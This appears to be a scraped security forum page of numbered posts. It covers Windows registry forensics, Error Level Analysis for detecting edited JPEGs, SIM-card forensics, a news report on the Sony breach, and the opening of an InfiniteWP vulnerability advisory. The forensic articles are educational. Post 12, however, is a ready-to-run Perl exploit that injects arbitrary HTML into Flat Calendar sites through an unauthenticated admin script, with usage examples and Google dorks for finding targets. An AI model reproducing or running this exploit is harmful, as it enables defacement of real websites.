folder-based one, but this is merely an abstraction designed by the registry editor. In reality, the registry is just a collection of files located on the user’s hard drive. The registry files in charge of the system and the applications on the user’s machine are located in the following path: Local Disk:Windowssystem32config, while the registry files in charge of data that is related to the user and his application settings are located in the Windows user profile directory called ntuser.dat and usrclass.dat. Furthermore, Figure 1 reveals that the binary structure of the registry is based on cells, the notable ones being keys and values. Although additional cell types exist, it can be said that they act as pointers to other keys (subkeys) and values. Values encompass data and they do not direct to other keys. Registry hives and their supporting files as a useful additive for forensic analysts Keys, subkeys, and values are typically part of different hives, which are logical groups of the former and have a set of supporting files that encompass backups of their data. User profile hives can be found in the HKEY_USERS key and they store specific registry data that is related to the user’s application settings, desktop, and environment as well as holding data related to his/her printer(s) and network connections. Each user on a machine has his/her own hive, which is responsible for his/her user profile. Below, we have enumerated some extensions of supporting files and have shown what information to expect from such a file extension: No extension = a thorough replica of the hive’s data. Extension .alt = a duplicate of the HKEY_LOCAL_MACHINESystem hive. It should be noted that the system key is the sole key whose backup files use this file extension as it is a crucial hive. Extension .log = a record of modifications in the hive’s keys and values. Extension .sav = a backup replica of a hive. After discussing the types of supporting files and what data they hold, we can move on to show what file names the supporting files of the standard hives have. Below is a graphic (Figure 2) that illustrates the standard hives and their supporting files. Points of interest for forensic analysts in the registry’s key cell structure Deleting a registry key would not make it “go” somewhere but it would rather cause its size value to be set to a positive one while undeleted keys have a negative value. Essentially, the space consumed by the registry keys gets labeled as available and it becomes possible to overwrite it. From the point of view of a signed integer, a registry key has a negative value but from a hexadecimal point of view, the key structure is indeed positive. The code “Unpack(“l”,$dword)” may be employed to parse the DWORD value as a signed integer using Perl. Keys contain the useful LastWrite time, which pinpoints when the last modification of the key took place. Modification may consist of changes to an existing subkey or value, the deletion of existing subkeys or values, or the creation of new ones. Figure 3 reveals the most notable key cell structure elements from the point of view of a forensic analyst. Their size in bytes and their offset are also included in the illustration. Some preliminary information: Registry keys typically begin with a four-byte double word that contains the size of the particular key. After the double word, there is a key node identifier “nk,” which tell us that what we are looking at is a key and not a value. Subsequently, there is a two-byte value that reveals the node type. “0x2C” indicates a root key cell whereas “0×20? indicates an ordinary key cell. The LastWrite time is actually “a 64-bit FILETIME object that marks the number of 100-nanosecond epochs since midnight of 1 January 1601,” but it can be perceived as equivalent to the time when the file was last changed, since it reveals when a modification was made to the key. An offset pinpoints the distance between the start of an object and a particular point or element, usually within the same object. Registry case study Below, we will be looking at two cases in the solving of which the registry proved to be instrumental. Credit card theft The Windows registry facilitated law enforcement in solving a credit card case in Houston, Texas. The suspects were a man and his wife who bought goods from the Internet with pilfered credit card numbers. They were detained as a result of a controlled drop of commodities ordered from the Internet. When ntuser.dat, the registry, and the protected storage system provider were scrutinized, a list of numerous names, addresses, and credit card numbers were found. It turned out that the information in the list was applied online to purchase goods as well, and after an additional investigation it was concluded that these credit card numbers were used illegally, without any permission from their owners. The data retrieved from the registry was sufficient to exact more search warrants which led to the arrest of 22 persons and the retrieval of illegally bought goods worth more than $100,000. The development of the events turned out to be the following: All defendants pled guilty to organized crime accusations and served time in jail, which may have not been possible without the help of the Windows registry. Child pornography Guests at a hotel located in a little town near Austin, Texas, called the law enforcement authorities after seeing a person, who looked intoxicated, walking around the hotel naked. When the law enforcement officials arrived after the 911 call they located the individual and concluded that he was, in fact, staying at that hotel so they escorted him to his room and there they discovered that he was staying with another person—but what surprised them was that a picture of child pornography was being projected on the wall. The picture was projected through a laptop that had a projector attached to it. In close proximity to the laptop, there were two external hard drives. The individual who was already in the room was surprised by the entry of the police and he asserted that the laptop was his but that the external drives belonged to his intoxicated fellow and had nothing to do with him. The equipment was immediately confiscated and sent for analysis. Forensic clones were created from the laptop and the two external hard drives without delay. The initial analysis of the external hard drives revealed the existence of pictures and movies of child pornography on them. Consequently, the forensic analysts had to find out whether any of these external drives were connected to the laptop of the individual asserting that he had nothing to do with them. Thus, the laptop’s system registry file was examined to match any entries in the USBStor key with the external drives. This turned out to be a fruitful examination, as listings for the external drives were found as well as their hardware serial numbers. Following these steps, the forensic analysts had to determine whether their results were authentic, so they linked the suspect’s external drives to their lab’s computer system, using a freshly installed version of Windows. To avert any alteration to the clones of the EHDs a write blocker was linked between the two drives and the system. Lastly, they examined the clone’s system registry file and the USBStor keys and came to the same conclusion, that the EHDs listings were identical to the defendant’s, in addition to having the same hardware serial numbers, and this proved that at some point in time the EHDs were connected to the suspect’s laptop. Ultimately, the culprit was sentenced for possessing child pornography. Using open source tools for the examination of the Windows Registry. Modules The Win32::TieRegistry is a Perl module that digs out data not only from local systems but also from remote ones. It can be used on live Windows systems. Equivalent to this is the Python module winreg, which is presented for the achievement of the same goal. However, tools like Win32::TieRegistry are not cross-platform and will not work on default OS X or Linux installations, as they depend on the native Windows API. There are many Perl scripts that take advantage of the Win32::TieRegistry Perl module, such as regscan.pl. You may also want to create your own Perl scripts that will collect the LastWrite time from the registry hives so you can sort and parse the information in any way you like. Considering you have images collected from the system, the Perl module Parse::Win32Registry seems like a good choice, partially because it is cross-platform. The Win32::TieRegistry rests on the shoulders of the API offered by Windows systems and grants us entry into the registry information on the live systems, while the Parse::Win32Registry module retrieves hive files in their binary form and gives us a level of abstraction that enables us to open a registry value simply by procuring the module with a key path like “Software/Python/PythonCore/3.3/Modules.” Brief overview of some open source tools F-Response is a software utility that allows examiners to “conduct live forensics, data recovery, and eDiscovery over an IP network using their tool(s) of choice.” If you resort to this utility as a means of widening the scope of your incident response range and capacity, you can be misled into thinking that you are intermingling with a live system when, in fact, while utilizing F-Response you will be communicating with hive files in a binary form; therefore, tools based on the Parse::Win32Registry will be handier than tools based on the Win32::TieRegistry module. A tool that that is very beneficial in investigations is RegRipper, which not only parses registry hives extracted from images but also parses registry hives extracted from within a mounted image and from a system that was entered through F-Response’s application. RegRipper bases its dealings with the registry hive files on the Parse::Win32Registry module. It operates through plugins that are tiny files comprising Perl code, which pull out various types of information. rr.pl is the main script of the application, which can be categorized as a GUI interface to a motor that handles all those plugins. The application can be launched in a Linux environment on which WINE has been installed and it comes in various Linux-centered and forensic-based toolkits such as PlainSight. RegRipper also contains a command line interface tool named rip.pl that makes it possible for examiners to execute particular plugins against a hive or run listings of plugins (as they can do with RegRipper’s GUI – rr.pl). If you are searching for a way in which to obtain concrete data out of a hive or to test recently produced plugins, Rip.pl comes in handy. Several scripts were created to exploit the property of registry keys that they do not go away after deletion. Such an exploit, if it is appropriate to name it so, is a Perl script that was made in 2008 and got the name Regslack. Regslack parses through hive files and recovers removed keys. Conclusion This article is a part of a series, “Windows System Artifacts in Digital Forensics.” and objects of examination in the consecutive articles will be Windows file systems, registry, shortcut files, hibernation files, prefetch files, event logs, Windows executables, metadata, recycle bin, print spooling, thumbnail images, and lists of recently used applications, along with a brief discussion of how to find removed information and how to work with restore points and shadow copies. Note that most of the abovementioned artifacts are Windows-specific and are unique to this operating system. Further reading: Carvey, Harlan, “Windows Registry Forensics: Advanced Digital Forensic Analysis of the Windows Registry,” 2011 References: Bott Ed, “Latest OS share data shows Windows still dominating in PCs,” 2013. Available at: Latest OS share data shows Windows still dominating in PCs | ZDNet Windows Dev Center, “Registry Hives.” Available at: Registry Hives (Windows) Wikipedia, “Windows Registry.” Available at: Windows Registry - Wikipedia, the free encyclopedia F-Response, available at: https://www.f-response.com/ Microsoft Support, “Windows registry information for advanced users.” Available at: http://support.microsoft.com/kb/256986 Cory Altheide & Harlan Carvey, “Digital Forensics with Open Source Tools,” 2011 Sammons John, “The Basics of Digital Forensics: The Primer for Getting Started in Digital Forensics,” 2012
  10. Introduction Error Level Analysis is a forensic method to identify portions of an image with a different level of compression. The technique could be used to determine if a picture has been digitally modified. To better understand the techniques, it’s necessary to deepen the JPEG compression technique. JPEG (Joint Photographic Experts Group) is a method of lossy compression for digital images. It’s a data encodingalgorithm that compresses data by discarding (losing) some of it. The level of compression could be chosen as a reasonable compromise between picture size and image quality. A JPEG compression scale is usually 10:1. The JPEG algorithm works on image grids, compressed independently, having a size of 8×8 pixels. The 8X8 dimension was chosen after numerous experiments with other sizes, any matrices of sizes greater than 8 X 8 are harder to be mathematically manipulated or not supported by hardware, meanwhile any matrices of sizes less than 8 X 8 don’t have enough information. They result in poor quality compressed images. For images not digitally modified, all 8×8 grids should have a similar error level, resaving the picture. Each square should degrade at approximately the same rate, due to the introduction of an homogeneous amount of errors across the entire image. In a modified image, the altered grid should be at a higher error potential in respect to remaining part of the image. Image manipulation and analysis In August 2007, Dr. Neal Krawetz made an interesting presentation during the Black Hat conference titled “A Picture’s Worth.” It involved determing if a picture is real, or of a computer modification. Error Level Analysis (ELA) is one of the simpler methods presented by the researcher. In 2010, Pete Ringwood created the “errorlevelanalysis.com” website as a free service where people could submit photos and web pictures for analysis. The site was later closed. Hacker Factor has recreated the service “fotoforensics.com.” It’s free and allows any user to perform ELA analysis on their own photos. The methods to analyze the images presented by Krawetz are: Observation Basic image enhancements Image format analysis Advanced image analysis ELA Error Level Analysis is a very useful method to detect the manipulation of images belonging to an advanced image analysis. ELA works by re-saving the image at 95% compression, and evaluating the difference with the original. Modified areas are easily seen due their characteristic aspects in the ELA representation. The main methods used for the picture analysis are based on the following clues: Shadows- Analyze the shadows related to different objects in the picture, evaluating them in relation to the direction of the light source. Eyes- Zoom in and compare against other eyes. (Dots/colors give light direction) EXIF- Evaluating of EXIF file dat,a including GPS position, time and RBG color profile changes. Reflections- Analyze that the reflection within the image is coherent. Principal free tools are: FotoForensics Photo ELA Error Level Analysis Image Tool FotoForensics Jeffrey’s Exif Viewer Online EXIF data and GPS viewer analyzer http://regex.info/exif.cgi JPEGsnoop Fake image detection via image signature analysis JPEGsnoop | SourceForge.net IEXIF 2 Iexif is a professional Exif viewer in Windows Exif viewer : Opanda IExif - Professional EXIF / GPS / IPTC Viewer & Editor in Windows, IE & Firefox Image compression – the mapper Every computer image is composed of pixels made of three colors: red, green, and blue (RGB). The color value of a pixel is represented with a byte (0-255). The mapper (aka decoder) modifies the RGB color space to YCbCr color space, Y is the luminescence, Cb and Cr are the chrominance-blue and chrominance-red color portions. In YCbCr color space, most of the image data is available in Y component, Cb and Cr have color information. Figure – YCbCr representation The principle behind ELA Error Level Analysis evaluates the quality level for grids squared within the images. They present an increased degree of error during successive resave operations. The phenomenon is obvious if images aren’t optimized for a specified camera quality level. Subsequent resaves reduce the error level potential, producing a darker ELA. After a number of resaves, the grid square reaches its minimum error level. The Image Error Level Analyzer The Image Error Level Analyzer in an online tool that implements an ELA algorithm. By using it, it’s possible to rapidly discover image manipulation. The web tool is based on the Python Image Library and the libjpeg library (v6.2.0-822.2). The verification process consists of successive resaves of the image at a predefined quality. The resulting picture is compared with the original one. If an image hasn’t been manipulated, all its parts have been saved the same number of times, images are composed by a portion of other sources, or have been simply been manipulated, will show different level of errors visible in the ELA representation with different colors. The authors of the website also developed a Firefox plugin that enables users to analyze an image by simply right-clicking on any image on the internet. With the ELA method, it’s possible to discover image modification by establishing a chronological order of changes of various parts of the image. The lighter parts have been edited most recently, the most opaque have been saved several times. Although it accepts images of limited sizes, it also allows the submission of images up to 1224 pixels per side. The test The first step is the generation of an ELA image. Upload an image on FotoForensics, or simply provide its URL Figure – ELA web tool After pressing the “Process” button, users are redirected to a page containing the original image and the ELA. Let’s start with the original image: Figure – Original Image Then modify it by introducing a stack of coins and changing the aspect of the toad: Figure – Altered image At this point, let’s submit the picture to the online service to generate the following ELA representation. Figure – ELA image The sections that are black correspond to the parts that usually aren’t manipulated. Solid white blocks usually represent the same. Solid colors present a good level of compression with minimal error levels, displayed as darker areas in the image. ELA highlights the altered portions of the image that represent higher ELA values, and a bright white color. Note that in the outline of objects in high frequency areas, they usually have higher ELA values than the rest of the image. In the following image, the text of the books stands out because the contrast creates a high frequency edge. “In general, you should compare edges with edges and surfaces with surfaces. If all surfaces except one have similar ELA values, then the outlier should be suspect.” Another interesting example is provided by the Hacker Factor Blog (Hacker Factor: Home Page), this time an an allegedly winning lottery ticket is under analysis. ELA shows that the image has been modified, the digit “4? has been inserted in the “04? and “46?, and both “23? values were altered. The tool could provide false-negative results when different portions of the image have been resaved the same number of times. In this case, all the areas present same degree of error. There are some limitations to consider when conducting an ELA analysis. The technique operates on JPEG images based on a grid, changes to a portion of a grid to affect the entire grid square. That makes it impossible to identify the pixel modified. ELA can’t detect single pixel modification or minor color adjustment. Scaling and recoloring the picture impacts the entire image, introducing a greater error level potential. Another element of noise for ELA is represented by the presence of high contrast colors within the same grid, for example black and white colors, which generate high ELA values. This anomaly is attributable to the fact that JPEG uses the YUV color space representation. Thanks to ELA analysis, it’s possible to discover if the image was the result of a conversion from another format. For example, if a non-JPEG image contains visible grid lines (1-pixel wide in 8×8 squares), it means the picture was originally a JPEG that was later converted to a non-JPEG format. Another interesting case in ELA literature is that in an image converted from the PNG format to JPEG, ELA analysis produces very high levels of error in edges and textures. That appears as a prevalence of dark or black coloring. A conversion from JPEG to PNG is lossless, and will retain JPEG artifacts. The rainbowing technique Rainbowing indicates the visible separation between the luminance and chrominance channels, as blue,purple and red. Rainbowing evaluation is possible because JPEG separates colors into luminance and chrominance channels. The luminance is the gray-scale intensity of the image, while the chrominance-red and chrominance-blue components identify the amount of coloring, independent of the full color’s intensity. Picture modification with commercial tools such as Photoshop or Gimp can introduce distinct rainbowing pattern surfaces that have near-uniform coloring. High-quality camera photos may also include a rainbowing effect along uniformly colored surfaces. Photoshop and other Adobe products introduce a large amount of rainbowing, different from other tools such as Microsoft Paint, that don’t do so. Beware that the presence of rainbowing may only mean that an Adobe product, like Photoshop or Lightroom, was used to save the image. It may not represent proof of intentional image alteration. A controversial case During the last World Photo Awards,World Press Photo said that Paul Hansen’s photo of mourners in Gaza was “retouched with respect to both global and local color and tone,” despite that there was no evidence of manipulation. Experts using ELA analysis were able to demonstrate a meaningful rainbowing effect (faint red and blue patches) and the presence of a higher ELA value on edges and textures were probably caused by Photoshop’s unintentional auto-sharpening. Figure – Original image Figure – ELA The rainbowing effect is clearly visible in various portions of the image, such as the sky, walls, and people. Another source of information is the metadata. Analyzing that makes it possible to evaluate the congruence of the light of the image. In this specific case, the photo was taken in the morning in November in the northern hemisphere, when the sun should be low on the horizon. The strong shadows on the left building allowed an expert to draw lines that intersect in the general direction of the sun. The sun wasn’t quite low, but maybe the reported time was wrong, and the lighting on the people doesn’t match the sun’s position. “The people should have dark shadows on their right sides (the left side of the photo), but their facial lighting does not match the available lighting.” According to the experts who analyzed the photo, it’s likely that the photographer took a series of photos and combined a few pictures, altering some aspects of the image. Conclusion Despite that proper application can allow experts to easily discover image modification (including scaling, cropping and resave operations), ELA analysis depends on the quality of the image. Working on a picture resulting from numerous resave operations isn’t effective.If an image is resaved numerous times, then it may have a minimum error level, where more resaves don’t alter the image. ELA will return a black image, and no modifications may be detected. The technique is very effective at discovering alterations introduced with tools like Photoshop or Gimp. By just saving a picture with these applications, users introduce a higher error level potential in the image. The downside is that these tools could be the cause of unintentional modification. Considered in the analysis of any picture that ELA is just an algorithm to analyze the images. Despite that it’s very efficient under specific conditions, it’s suggested to integrate it with other forensics tools to provide valid results. References Joint Photographic Experts Group - Wikipedia, the free encyclopedia Nick's Blog: Image Compression: How JPEG Works The Hacker Factor Blog http://www.hackerfactor.com/papers/bh-usa-07-krawetz-wp.pdf World Press Photo: ‘No evidence of significant photo manipulation’ in award-winning shot | Poynter. Tech Talk @ N3TLab.com: Photo ELA Error Level Analysis - Detecting Fake Images https://sites.google.com/site/elsamuko/forensics/ela FotoForensics Image Forensics : Error Level Analysis Error Level Analysis
  11. The SIM (subscriber identity module) is a fundamental component of cellular phones. It also known as an integrated circuit card (ICC), which is a microcontroller-based access module. It is a physical entity and can be either a subscriber identity module (SIM) or a universal integrated circuit card (UICC). A SIM can be removed from a cellular handset and inserted into another; it allows users to port identity, personal information, and service between devices. All cell phones are expected to incorporate some type of identity module eventually, in part because of this useful property. Basically, the ICC deployed for 2G networks was called a SIM and the UICC smart card running the universal subscriber identity module(USIM) application. The UICC card accepts only 3G universal mobile telecommunications service (UMTS) commands. USIMs are enhanced versions of present-day SIMs, containing backward-compatible information. A USIM has a unique feature in that it allows one phone to have multiple numbers. If the SIM and USIM application are running on the same UICC, then they cannot be working simultaneously. The first SIM card was about the size of a credit card. As technology developed, the cell phone began to shrank in size and so did the SIM card. The mini-SIM card, which is about one-third the size of a credit card. But today we are using smartphones that use micro-SIM, which is smaller than mini-SIM. These SIM cards vary in size but all have the functionality for both the identification and authentication of the subscriber’s phone to its network and all contain storage for phone numbers, SMS, and other information, and allow for the creation of applications on the card itself. SIM Structure and File Systems A SIM card contains a processor and operating system with between 16 and 256 KB of persistent, electronically erasable, programmable read-only memory (EEPROM). It also contains RAM (random access memory) and ROM (read-only memory). RAM controls the program execution flow and the ROM controls the operating system work flow, user authentication, data encryption algorithm, and other applications. The hierarchically organized file system of a SIM resides in persistent memory and stores data as names and phone number entries, text messages, and network service settings. Depending on the phone used, some information on the SIM may coexist in the memory of the phone. Alternatively, information may reside entirely in the memory of the phone instead of available memory on the SIM. The hierarchical file system resides in EEPROM. The file system consists of three types of files: master file(MF), dedicated files, and elementary files. The master file is the root of the file system. Dedicated files are the subordinate directories of master files. Elementary files contain various types of data, structured as either a sequence of data bytes, a sequence of fixed-size records, or a fixed set of fixed-size records used cyclically. As can be seen in the above figure, dedicated files are subordinate directories under the MF, their contents and functions being defined by the GSM11.11 standards. Three are usually present: DF (DCS1800), DF (GSM), and DF (Telecom). Also present under the MF are EFs (ICCID). Subordinate to each of the DFs are supporting EFs, which contain the actual data. The EFs under DF (DCS1800) and DF (GSM) contain network-related information and the EFs under DF (Telecom) contain the service-related information. All the files have headers, but only EFs contain data. The first byte of every header identifies the file type and the header contains the information related to the structure of the files. The body of an EF contains information related to the application. Files can be either administrative- or application-specific and access to stored data is controlled by the operating system. Security in SIM SIM cards have built-in security features. The three file types, MF, DF, and EF, contain the security attributes. These security features filter every execution and allow only those with proper authorization to access the requested functionality. There are different level of access conditions in DF and EF files. They are: Always—This condition allows to access files without any restrictions. Card holder verification 1 (CHV1)—This condition allows access to files after successful verification of the user’s PIN or if PIN verification is disabled. Card holder verification 2 (CHV2)—This condition allows access to files after successful verification of the user’s PIN2 or if the PIN2 verification is disabled. Administrative (ADM)—The card issuer who provides SIM to the subscriber can access only after prescribed requirements for administrative access are fulfilled. Never (NEV)—Access of the file over the SIM/ME interface is forbidden. The SIM operating system controls access to an element of the file system based on its access condition and the type of action being attempted. The operating system allows only limited number of attempts, usually three, to enter the correct CHV before further attempts are blocked. For unblocking, it requires a PUK code, called the PIN unblocking key, which resets the CHV and attempt counter. If the subscriber is known, then the unblock CHV1/CHV2 can be easily provided by the service provider. Sensitive Data in SIM The SIM card contains sensitive information about the subscriber. Data such as contact lists and messages can be stored in SIM. SIM cards themselves contain a repository of data and information, some of which is listed below: Integrated circuit card identifier (ICCID) International mobile subscriber identity (IMSI) Service provider name (SPN) Mobile country code (MCC) Mobile network code (MNC) Mobile subscriber identification number (MSIN) Mobile station international subscriber directory number (MSISDN) Abbreviated dialing numbers (ADN) Last dialed numbers (LDN) Short message service (SMS) Language preference (LP) Card holder verification (CHV1 and CHV2) Ciphering key (Kc) Ciphering key sequence number Emergency call code Fixed dialing numbers (FDN) Local area identity (LAI) Own dialing number Temporary mobile subscriber identity (TMSI) Routing area identifier (RIA) network code Service dialing numbers (SDNs) These data have forensics value and can be scattered from EF files. Now we will discuss some of these data. A. Service Related Information ICCID: The integrated circuit card identification is a unique numeric identifier for the SIM that can be up to 20 digits long. It consists of an industry identifier prefix (89 for telecommunications), followed by a country code, an issuer identifier number, and an individual account identification number. Twenty-digit ICCIDs have an additional “checksum” digit. One example of the interpretation of a hypothetical nineteen digit ICCID (89 310 410 10 654378930 1) is shown below. Issuer identification number (IIN) is variable in length up to a maximum of seven digits: The first two digits are fixed and make up the Industry Identifier. “89? refers to the telecommunications industry. -The next two or three digits refer to the mobile country code (MCC) as defined by ITU-T recommendation E.164. “310? refers to the United States. -The next one to four digits refer to the mobile network code (MNC). This is a fixed number for a country or world zone. “410? refers to the operator, AT&T Mobility. -The next two digits, “10,” pertain to the home location register. Individual account information is variable in length: -The next nine digits, “654378930,” represent the individual account identification number. Every number under one IIN has the same number of digits. Check digit—the last digit, “1,” is computed from the other 18 digits using the Luhn algorithm. IMSI: The international mobile subscriber identity is a unique 15-digit number provided to the subscriber. It has a similar structure to ICCID and consists of the MCC, MNC, and MSIN. An example of interpreting a hypothetical 15-digit IMSI (302 720 123456789) is shown below: MCC—The first three digits identify the country. “302? refers to Canada. MNC—The next two (European Standard) or three digits (North American Standard) identify the operator. “720? refers to Rogers Communications. MSIN—The next nine digits, “123456789,” identify the mobile unit within a carrier’s GSM network MSISDN—The Mobile Station International Subscriber Directory Number is intended to convey the telephone number assigned to the subscriber for receiving calls on the phone. An example of the MSISDN format is shown below: CC can be up to 3 digits. NDC usually 2 or 3 digits. SN can be up to a maximum 10 digits B. Phonebook and Call Information 1. Abbreviated dialing numbers (ADN)—Any number and name dialed by the subscriber is saved by the ADN EF. The type of number and numbering plan identification is also maintained under this. This function works on the subscriber’s commonly dialed numbers. The ADN cannot be changed by the service provider and they can be attributed to the user of the phone. Most SIMs provide 100 slots for ADN entries. 2. Fixed dialing numbers (FDN)—The FDN EF works similar to the ADN because it involves contact numbers and names. With this function, The user doesn’t have to dial numbers; by pressing any number pad of the phone, he can access to the contact number. 3. Last number dialed (LND)—The LND EF contains the number most recently dialed by the subscriber . The number and name associated with that number is stored in this entry. Depending upon the phone, it is also conceivable that the information may be stored in the handset and not on the SIM. Any numbers that may be present can provide valuable information to an investigator. XML Phonebook Entry C. Messaging Information—Messaging is a communication medium by which text is entered on one cell phone and delivered via the mobile phone network. The short message service contains texts and associated parameters for the message. SMS entries contain other information besides the text itself, such as the time an incoming message was sent, as recorded by the mobile phone network, the sender’s phone number, the SMS center address, and the status of the entry. An SMS is limited to either 160 characters (Latin alphabet) or 70 characters (for other alphabets). Longer messages are broken down by the sending phone and reassembled by the receiving phone. Tools for SIM Forensics To perform forensic investigation on a SIM card ,it has to be removed from the cell phone and connect to a SIM card reader. The original data of SIM card is preserved by the elimination of write requests to the SIM during its analysis. Then we calculate the HASH value of the data; hashing is used for checking the integrity of the data, that is, whether it has changed or not. There are lots of forensic tools are available but all tools are not able to extract data from every type of cell phone and SIM card. Now we will discuss about some famous tools: Encase Smartphone Examiner: This tool is specifically designed for gathering data from smartphones and tablets such as iPhone, iPad, etc. It can capture evidence from devices that use the Apple iOS, HP Palm OS, Windows Mobile OS, Google Android OS, or RIM Blackberry OS. It can acquire data from Blackberry and iTunes backup files as well as a multitude of SD cards. The evidence can be seamlessly integrated into EnCase Forensic. MOBILedit! Forensic: This tool can analyze phones via Bluetooth, IrDA, or cable connection; it analyzes SIMs through SIM readers and can read deleted messages from the SIM card. pySIM: A SIM card management tool capable of creating, editing, deleting, and performing backup and restore operations on the SIM phonebook and SMS records. AccessData Mobile Phone Examiner (MPE) Plus: This tool supports for than 7000 phones including iOS , Android , Blackberry, Windows Mobile, and Chinese devices and can be purchased as hardware with a SIM card reader and data cables. File systems are immediately viewable and can be parsed in MPE+ to locate lock code, EXIF, and any data contained in the mobile phone’s file system. SIMpull: SIMpull is a powerful tool, a SIM card acquisition application that allows you to acquire the entire contents of a SIM card. This capability includes the retrieval of deleted SMS messages, a feature not available on many other commercial SIM card acquisition programs. SIMpull first determines if the card is either a GSM SIM or 3G USIM, then performs a logical acquisition of all files defined in either ETSI TS 151.011 (GSM) or ETSI TS 131.102 (USIM) standards. As can be seen in above figure, by using the SIMpull application we can see the information of SMS such as a SMS text and its length, the SMS sender’s number information, service center information, etc. References SIM Forensics: Part 1 Sim Forensics: Part 2 SIM Forensics: Part 3 https://www.visualanalysis.com/ProductsVA_SIMpull.aspx http://csrc.nist.gov/groups/SNS/mobile_security/documents/mobile_forensics/Reference%20Mat-final-a.pdf Source
  12. #!/usr/bin/perl -w #Title : Flat Calendar v1.1 HTML Injection Exploit #Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip #Author : ZoRLu / zorlu@milw00rm.com #Website : http://milw00rm.com / its online #Twitter : https://twitter.com/milw00rm or @milw00rm #Test : Windows7 Ultimate #Date : 08/12/2014 #Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others #BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali ) #Dork1 : intext:"Flat Calendar is powered by Flat File DB" #Dork2 : inurl:"viewEvent.php?eventNumber=" # #C:\Users\admin\Desktop>perl flat.pl # #Usage: perl flat.pl http://server /calender_path/ indexfile nickname #Exam1: perl flat.pl http://server / index.html ZoRLu #Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu # #C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu # #[+] Target: http://server #[+] Path: /member_content/diaries/womens/calendar/ #[+] index: index.html #[+] Nick: ZoRLu #[+] Exploit Succes #[+] Searching url... #[+] YourEventNumber = 709 #[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709 use HTTP::Request::Common qw( POST ); use LWP::UserAgent; use IO::Socket; use strict; use warnings; sub hlp() { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n"; print "Exam1: perl $0 http://server / index.html ZoRLu\n"; print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n"; } if(@ARGV != 4) { hlp(); exit(); } my $ua = LWP::UserAgent->new; my $url = $ARGV[0]; my $path = $ARGV[1]; my $index = $ARGV[2]; my $nick = $ARGV[3]; my $vuln = $url . $path . "admin/calAdd.php"; print "\n[+] Target: ".$url."\n"; print "[+] Path: ".$path."\n"; print "[+] index: ".$index."\n"; print "[+] Nick: ".$nick."\n"; my @MONThs = qw(January February March April May June July August September October November December); my ($day, $month, $yearset) = (localtime)[3,4,5]; my $year = 1900 + $yearset; my $moon = $months[$month]; if (open(my $fh, $index)) { while (my $row = <$fh>) { chomp $row; my $req = POST $vuln, [ event => 'Test Page', description => $row, month => $moon, day => $day, year => $year, submitted => $nick, ]; my $resp = $ua->request($req); if ($resp->is_success) { my $message = $resp->decoded_content; my $regex = "Record Added: taking you back"; if ($message =~ /$regex/) { print "[+] Exploit Succes\n"; my $newua = LWP::UserAgent->new( ); my $newurl = $url . $path . "calendar.php"; my $newreq = $newua->get($newurl); if ($newreq->is_success) { my $newmessage = $newreq->decoded_content; my $first = rindex($newmessage,"viewEvent.php?eventNumber="); print "[+] Searching url...\n"; my $request = substr($newmessage, $first+26, 4); print "[+] YourEventNumber = $request\n"; sleep(1); print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n"; } else { print "[-] HTTP POST error code: ", $newreq->code, "\n"; print "[-] HTTP POST error message: ", $newreq->message, "\n"; } } else { print "[-] Exploit Failed"; } } else { print "[-] HTTP POST error code: ", $resp->code, "\n"; print "[-] HTTP POST error message: ", $resp->message, "\n"; } } } else { sleep(1); die ("[-] NotFound: $index\n"); } Source
  13. Hackers have leaked documents alleging to be the terms of Sony's licensing agreement with Netflix. The hackers sent the information to V3 using various compromised email addresses as a part of a wider data dump. The messages included a basic 'We have released the data here' text and link to data reserves stored on various free upload sites. Sony and Netflix had not responded to V3's request for comment on the alleged leaks at the time of publishing. The Netflix files were stored on shorttext.com, and F-Secure security analyst Sean Sullivan, who aided V3's investigation, said that the files "seem" to have been based in Virginia and hosted on Amazon's cloud. The file had been deleted at the time of publishing. Prior to the Netflix message the hackers sent V3 links to various other alleged leaks, which claim to be information on over 3,000 contacts, including celebrities, stolen from Sony Pictures Entertainment. The leaks are the latest in a stream of security woes for Sony. The security crisis began in November when a group operating under the #GOP hashtag attempted to blackmail the firm. "We've obtained all your internal data, including your secrets and top secrets. If you don't obey us, we'll release data shown below to the world," the group said in a message posted on the site. The reason for the attack remains unknown, although industry rumblings suggest that the motivation is political and aims to stop Sony releasing controversial comedy The Interview. The source of the attack is also shrouded in mystery, but North Korea has refused to confirm that it is not behind the campaign. The attack has led to a fresh backlash against Sony for its lax security practices. Reports suggest that the hackers managed to access so many of the firm's systems as Sony stored passwords in an unprotected file labelled 'passwords'. The hack is reportedly being investigated by the FBI. Sony is rumoured to have hired advanced threat specialists at security firm Mandiant to help with the investigation. Sony is one of several big name companies to suffer data breaches this year. JPMorgan revealed in October that a cyber strike on its systems successfully compromised data belonging to 76 million households and seven million small to medium sized businesses. The chief executive of US retail giant Target, Gregg Steinhafel, stepped down in the wake of a data breach in May. Source
  14. Multiple vulnerabilities in InfiniteWP Admin Panel https://lifeforms.nl/20141210/infinitewp-vulnerabilities/ ----- InfiniteWP (http://www.infinitewp.com/) allows an administrator to manage multiple Wordpress sites from one control panel. According to the InfiniteWP homepage, it is used on over 317,000 Wordpress sites. The InfiniteWP Admin Panel contains a number of vulnerabilities that can be exploited by an unauthenticated remote attacker. These vulnerabilities allow taking over managed Wordpress sites by leaking secret InfiniteWP client keys, allow SQL injection, allow cracking of InfiniteWP admin passwords, and in some cases allow PHP code injection. It is strongly recommended that InfiniteWP users upgrade to InfiniteWP Admin Panel 2.4.4, and apply the recommendations at the end of this post. ----- Issue 1: login.php unauthenticated SQL injection vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.2 User-controlled parameter email appears in a SQL query modified by function filterParameters() which ostensibly "filters" its arguments, but escaping is not being performed, because the parameter $DBEscapeString is set to false by default. This allows for SQL injection. ----- Issue 2: execute.php unauthenticated SQL injection vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.3 User-controlled parameter historyID appears without quotes in a SQL query. Additionally, user-controlled parameters historyID and actionID should be escaped by function filterParameters(), but escaping is not being performed, because 